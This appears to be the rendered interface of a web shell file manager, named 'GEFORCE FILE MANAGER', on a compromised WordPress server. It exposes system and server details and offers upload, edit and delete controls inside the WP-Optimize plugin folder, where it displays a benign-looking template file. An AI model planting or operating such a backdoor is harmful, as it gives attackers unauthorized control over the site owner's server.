[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
templates
/
performance
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 404-detector.php
5,762 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-health.php
397 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: site-health.php
<?php if (!defined('WPO_VERSION')) die('No direct access allowed'); ?> <div class="health-check-body health-check-status-tab hide-if-no-js"> <h1><?php echo esc_html__('Issues impacting your site performance', 'wp-optimize'); ?></h1> <div class="site-status-has-issues"> <?php echo $alerts; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Already escaped ?> </div> </div>